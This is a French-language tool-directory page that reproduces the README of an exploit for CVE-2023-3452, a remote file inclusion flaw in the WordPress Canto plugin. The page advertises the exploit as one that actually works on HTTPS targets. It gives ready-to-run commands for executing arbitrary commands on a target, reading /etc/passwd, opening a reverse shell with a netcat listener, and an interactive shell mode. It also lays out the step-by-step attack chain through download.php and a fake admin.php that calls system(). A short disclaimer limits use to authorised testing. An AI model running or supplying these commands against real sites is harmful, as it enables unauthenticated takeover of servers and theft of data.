Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — Exploit CVE-2023-3452 pour le plugin Canto WordPress RCE, support HTTPS inclus | Kitploit
Outils/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

Exploit CVE-2023-3452 pour le plugin Canto WordPress RCE, support HTTPS inclus

Voir le dépôt
13il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-3452 - Plugin Canto WordPress RCE

Exploit pour la vulnérabilité RFI du plugin WordPress Canto (≤ 3.0.4). Fonctionne réellement sur HTTPS — les autres PoCs publics abandonnaient sur SSL.

Crédit là où il est dû : cette CVE a été trouvée par d'autres. J'ai juste créé une version qui ne casse pas sur les cibles HTTPS.

Vulnérabilité

CVECVE-2023-3452
EDB-ID51826
TypeInclusion de fichier distant (RFI) → RCE non authentifiée
AffectéPlugin Canto WordPress < 3.0.5 (≤ 3.0.4)
Découvert parLeopoldo Angulo (leoanggal1) — 2024-02-27
Emplacement/wp-content/plugins/canto/includes/lib/download.php
Vecteurwp_abspath est utilisé pour inclure des fichiers PHP sans aucune validation — nous incluons le nôtre à distance.

Pourquoi celui-ci ?

La plupart des exploits pour cette CVE échouent sur HTTPS à cause de la vérification SSL. Ce script :

  • Utilise verify=False pour que les cibles HTTPS fonctionnent réellement
  • Supprime les messages d'avertissement urllib3
  • Fonctionne aussi bien sur HTTP que sur HTTPS — aucune configuration séparée nécessaire

Prérequis

  • Python 3.6+
  • requests

Installation

pip install -r requirements.txt

Ou simplement : pip install requests

Utilisation

python3 canto_exploit.py -t <URL_CIBLE> -l <VOTRE_IP> -p <VOTRE_PORT> [OPTIONS]

Arguments

OptionDescriptionRequis
-t, --targetURL cible WordPress (HTTP ou HTTPS)Oui
-l, --lhostVotre IP — la cible doit pouvoir vous joindre pour la payloadOui
-p, --lportPort du serveur de payload (par défaut : 8888)Non
-c, --commandCommande à exécuter sur la cibleNon*
--revshellLancer un reverse shellNon
--shell-portPort d'écoute pour le reverse shell (par défaut : 4444)Non
-i, --interactiveMode shell interactifNon
-v, --verboseSortie verboseNon
--skip-checkIgnorer la vérification de vulnérabilitéNon

* Aucune commande = exécute id; whoami; hostname comme test de base

Exemples

Commande unique :

python3 canto_exploit.py -t https://cible.com -l 10.10.14.33 -p 8888 -c "id"

Lire un fichier :

python3 canto_exploit.py -t https://cible.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

Reverse shell (lancez d'abord nc -lvnp 4444) :

python3 canto_exploit.py -t https://cible.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

Mode interactif :

python3 canto_exploit.py -t https://cible.com -l 10.10.14.33 -p 8888 -i

Cible CTF HTTPS :

python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

Comment ça marche

  1. Vérification — Accède à /wp-content/plugins/canto/readme.txt, analyse la version (≤ 3.0.4 = vulnérable)
  2. Payload — Écrit un faux wp-admin/admin.php qui exécute votre commande via system()
  3. Serveur — Démarre un serveur HTTP local pour que la cible puisse récupérer notre fichier
  4. Déclenchement — Envoie une requête à download.php avec wp_abspath=http://VOTRE_IP:VOTRE_PORT pour qu'il inclue notre PHP distant
  5. Exécution — Leur serveur exécute notre code, nous récupérons la sortie

Notes réseau

  • La cible doit pouvoir joindre votre machine sur VOTRE_IP:VOTRE_PORT (pour HTB/labs, c'est votre IP VPN)
  • Le pare-feu doit autoriser les connexions entrantes sur le port de la payload (-p)

Avertissement

Tests autorisés et éducation uniquement. N'intervenez que sur des systèmes que vous avez le droit de tester. Tout autre usage est illégal.

Licence

MIT

Télécharger l’outil